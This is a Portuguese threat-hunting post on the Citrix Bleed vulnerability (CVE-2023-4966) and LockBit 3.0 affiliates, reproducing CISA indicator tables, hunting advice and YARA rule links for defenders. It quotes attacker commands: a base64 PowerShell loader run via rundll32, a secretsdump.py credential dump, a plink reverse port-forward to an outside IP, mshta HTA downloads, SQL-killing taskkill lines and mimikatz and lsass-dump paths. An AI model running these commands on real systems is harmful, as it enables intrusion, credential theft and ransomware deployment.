Hunting CVE 2023-4966 IOCs

O CVE-2023-4966, conhecido como “Citrix Bleed“, é uma vulnerabilidade crítica de divulgação de informações no Citrix NetScaler Application Delivery Controller (ADC) e no NetScaler Gateway.

Citrix Bleed e LockBit 3.0

O Citrix Bleed é conhecido por ser explorado pelas afiliadas do LockBit 3.0, historicamente, as afiliadas do LockBit 3.0 conduziram ataques contra organizações de tamanhos variados em vários setores de infraestrutura crítica, incluindo educação, energia, serviços financeiros, alimentos e agricultura, serviços governamentais e de emergência, saúde, manufatura e transporte.

Hunting

Priorizar a observação dos usuários em sessão ao procurar anomalias na rede. Isso ajuda na busca por atividades suspeitas, como instalação de ferramentas no sistema (por exemplo, putty, rClone), criação de novas contas, logs de falha ou execução de comandos como hostname, quser, whoami, net e taskkill.

Para endereços IP:

• Identifique se o NetScaler registra a alteração no IP.
• Identifique se os usuários estão fazendo login em locais geográficos incomuns para a base de usuários da sua organização.
• Ao registrar a autenticação VPN, identifique se os usuários estão associados a dois ou mais endereços IP públicos enquanto estão em uma sub-rede diferente ou geograficamente dispersos.

Nota: A MFA para NetScaler não funcionará conforme planejado porque o invasor ignora a autenticação fornecendo um token/sessão para um usuário já autenticado.

Os procedimentos a seguir podem ajudar a identificar a exploração potencial da atividade CVE-2023-4966 e LockBit 3.0:

• Pesquise nomes de arquivos que contenham tf0gYx2YI para identificar arquivos criptografados LockBit.
• Atores do LockBit 3.0 geralmente usam C:\Temp para download, e execução de arquivos.
• Investigue solicitações para o endpoint HTTP/S do WAF.
• Procure padrões de login suspeitos nos logs do NetScaler
• Procure chaves de registro do Windows suspeitas do agente de desktop virtual
• Analise arquivos de dump principal de memória.

Indicadores de Comprometimento (IOCs)

O site oficial da Cybersecurity and Infrastructure Security Agency (CISA), uma agência federal dos Estados Unidos publicou um relatório completo sobre o tema e deixou disponibilizado os IOCs normalmente explorados pelos afiliados.

• Baixe a versão em PDF deste relatório:
  • AA23-325A LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability
    
• Download da lista de IOCs
  • AA23-325A STIX XML
  • AA23-325A STIX JSON

Regras YARA

Neste repositório, você encontrará 4 regras YARA distintas, cada uma projetada para identificar diferentes aspectos e variantes do ransomware Lockbit descrita no documentos oficial do CISA.

• LockBit3.CVE2023-4966_BAT.YARA
• LockBit3.CVE2023-4966_DLL.YARA
• LockBit3.CVE2023-4966_EXE.YARA
• LockBit3.CVE2023-4966_PY.YARA

https://github.com/danieldonda/YARA_RULES/tree/main

LOLBINS

O malware identificado nesta campanha é gerado começando com a execução de um script PowerShell (123.ps1) que concatena duas strings base64, converte-as em bytes e grava-as no caminho de arquivo designado.

$y = “TVqQAAMA…<string longa base64>”
$x = “RyEHABFQ…<string longa base64>”
$filePath = “C:\Usuários\Público\adobelib.dll” $fileBytes = [System.Convert]::FromBase64String($y + $x)
[System.IO.File]::WriteAllBytes($filePath, $fileBytes)

O arquivo resultante (adobelib.dll) é então executado pelo script do PowerShell usando rundll32. rundll32 C:\Users\Public\adobelib.dll,main <chave hexadecimal 104>

• https://valhalla.nextron-systems.com/info/search?keyword=CVE-2023-4966

IOCs

Indicator	Type	Fidelity	Description
192.229.221[.]95	IP	Low	Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.
123.ps1	PowerShell script	High	Creates and executes payload via script.
193.201.9[.]224	IP	High	FTP to Russian geolocated IP from compromised system.
62.233.50[.]25	IP	High	Russian geolocated IP from compromised system. Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html
51.91.79[.].17	IP	Med	Temp.sh IP.
Teamviewer	Tool (Remote Admin)	Low
70.37.82[.]20	IP	Low	IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.
185.17.40[.]178	IP	Low	Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address.

Indicator	Type	Fidelity	Description
185.229.191.41	Anydesk Usage	High	Anydesk C2.
81.19.135[.]219	IP	High	Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta
45.129.137[.]233	IP	Medium	Callouts from known compromised device beginning during the compromised window.
185.229.191[.]41	Anydesk Usage	High	Anydesk C2.
Plink.exe	Command interpreter	High	Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.
AnyDeskMSI.exe	Remote admin tool	High	We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.
SRUtility.exe	Splashtop utility		9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a
Netscan exe	Network scanning software	High	498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155

Indicator	Type	Fidelity	Description
Scheduled task: \MEGA\MEGAcmd	Persistence	High
Scheduled task: UpdateAdobeTask	Persistence	High
Mag.dll	Persistence	High	Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63.
123.ps1	Script	High	Creates rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44.
Adobelib.dll	Persistence	Low	C2 from adobelib.dll.
Adobe-us-updatefiles[.]digital	Tool Download	High	Used to download obfuscated toolsets.
172.67.129[.]176	Tool Download	High	IP of adobe-us-updatefiles[.]digital.
104.21.1[.]180	Tool Download	High	Adobe-us-updatefiles[.]digital.
cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1	Command	High	wmiexec.exe usage
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1	Command	High	wmiexec.exe usage
cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1	Command	High	wmiexec.exe usage
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex	Command	High	wmiexec.exe usage
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1	Command	High	wmiexec.exe usage

Indicator	Type	Fidelity	Description	Notes
81.19.135[.]219	IP	High	Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta
81.19.135[.]220	IP	High	Russian geolocated IP, seen outbound in logs	IP registered to a South African Company
81.19.135[.]226	IP	High	Russian geolocated IP, seen outbound in logs	IP registered to a South African Company

Type	Indicator	Description
Filename	c:\users\<username>\downloads\process hacker 2\peview.exe	Process hacker
Filename	c:\users\<username>\music\process hacker 2\processhacker.exe	Process hacker
Filename	psexesvc.exe	Psexec service excutable
Filename	c:\perflogs\processhacker.exe	Process hacker
Filename	c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe	Process hacker transferred via screenconnect
Filename	c:\perflogs\lsass.dmp	Lsass dump
Filename	c:\users\<username>\downloads\mimikatz.exe	Mimikatz
Filename	c:\users\<username>\desktop\proc64\proc.exe	Procdump
Filename	c:\users\<username>\documents\veeam-get-creds.ps1	Decrypt veeam creds
Filename	secretsdump.py	Impacket installed on azure vm
Cmdline	secretsdump.py <domain>/<username>@<ip> -outputfile 1	Impacket installed on azure vm
Filename	ad.ps1	Adrecon found in powershell transcripts
Filename	c:\perflogs\64-bit\netscan.exe	Softperfect netscan
Filename	tniwinagent.exe	Total network inventory agent
Filename	psexec.exe	Psexec used to deploy screenconnect
Filename	7z.exe	Used to compress files
Tool	Action1	RMM
Tool	Atera	RMM
tool	anydesk	rmm
tool	fixme it	rmm
tool	screenconnect	rmm
tool	splashtop	rmm
tool	zoho assist	rmm
ipv4	101.97.36[.]61	zoho assist
ipv4	168.100.9[.]137	ssh portforwarding infra
ipv4	185.20.209[.]127	zoho assist
ipv4	185.230.212[.]83	zoho assist
ipv4	206.188.197[.]22	powershell reverse shell seen in powershell logging
ipv4	54.84.248[.]205	fixme ip
Ipv4	141.98.9[.]137	Remote IP for CitrixBleed
domain	assist.zoho.eu	zoho assist
filename	c:\perflogs\1.exe	connectwise renamed
filename	c:\perflogs\run.exe	screenconnect pushed by psexec
filename	c:\perflogs\64-bit\m.exe	connectwise renamed
filename	c:\perflogs\64-bit\m0.exe	connectwise renamed
filename	c:\perflogs\za_access_my_department.exe	zoho remote assist
filename	c:\users\<username>\music\za_access_my_department.exe	zoho remote assist
filename	c:\windows\servicehost.exe	plink renamed
filename	c:\windows\sysconf.bat	runs servicehost.exe (plink) command
filename	c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi	zoho remote assist used to transfer data via screenconnect
cmdline	echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>	plink port forwarding
domain	eu1-dms.zoho[.]eu	zoho assist
domain	fixme[.]it	fixme it
domain	unattended.techinline[.]net	fixme it

Referências

• CISA Advisory: #StopRansomware: LockBit 3.0
• Alert (AA22-321A) #StopRansomware: Hive Ransomware
• CSA Alert (AA22-249A) #StopRansomware: Vice Society
• #StopRansomware: BianLian Ransomware Group
• CISA Advisory: Royal Ransomware